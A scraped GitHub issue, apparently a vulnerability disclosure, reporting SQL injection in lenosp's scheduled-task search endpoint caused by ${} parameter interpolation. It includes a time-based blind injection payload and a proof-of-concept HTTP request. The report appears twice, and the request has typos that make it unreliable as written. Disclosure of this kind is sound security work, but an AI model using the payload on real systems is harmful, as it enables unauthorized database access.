You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
There is a SQL injection vulnerability in the search box of the scheduled task module of lenosp, and there is a SQL injection vulnerability in the showUser method in/job/showJobList. The vulnerability is caused by the use of the ${} format in the SQL statement of the fuzzy search function to receive parameters input by the foreground user, which allows attackers to inject SQL statements with these parameters
Payload: page=1&limit=10&jobName=123456' AND (SELECT 3228 FROM (SELECT(SLEEP(5)))GQPB) AND 'jUEA'='jUEA&jobDesc=
poc:
GET /job/showJoblist?page=l&limit=10&jobName=123456&jobDesc-HTTP/1.1Host: 127.0.0.1:8081
sec-ch-ua:"Chromium";="105","Not)A;Brand";v="8"Accept: application/json, text/javascript,*/x; q=0.01X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; 64) AppleWebKit/537.36 (KHTML,like Gecko)Chrome/105.0.5195.54 Safar/537.36
sec-ch-ua-platform: "windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest:empty
Referer: http://127.0.0.1:8081/main
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;g=0.9
Cookie: JSESSIONID=0d2b7d58-a6f1-4210-9af5-4eedb72502c7
Connection: close
defect code
The text was updated successfully, but these errors were encountered:
There is a SQL injection vulnerability in the search box of the scheduled task module of lenosp, and there is a SQL injection vulnerability in the showUser method in/job/showJobList. The vulnerability is caused by the use of the ${} format in the SQL statement of the fuzzy search function to receive parameters input by the foreground user, which allows attackers to inject SQL statements with these parameters
Payload: page=1&limit=10&jobName=123456' AND (SELECT 3228 FROM (SELECT(SLEEP(5)))GQPB) AND 'jUEA'='jUEA&jobDesc=
poc:
GET /job/showJoblist?page=l&limit=10&jobName=123456&jobDesc-HTTP/1.1Host: 127.0.0.1:8081
sec-ch-ua:"Chromium";="105","Not)A;Brand";v="8"Accept: application/json, text/javascript,*/x; q=0.01X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; 64) AppleWebKit/537.36 (KHTML,like Gecko)Chrome/105.0.5195.54 Safar/537.36
sec-ch-ua-platform: "windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest:empty
Referer: http://127.0.0.1:8081/main
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;g=0.9
Cookie: JSESSIONID=0d2b7d58-a6f1-4210-9af5-4eedb72502c7
Connection: close
defect code
The text was updated successfully, but these errors were encountered: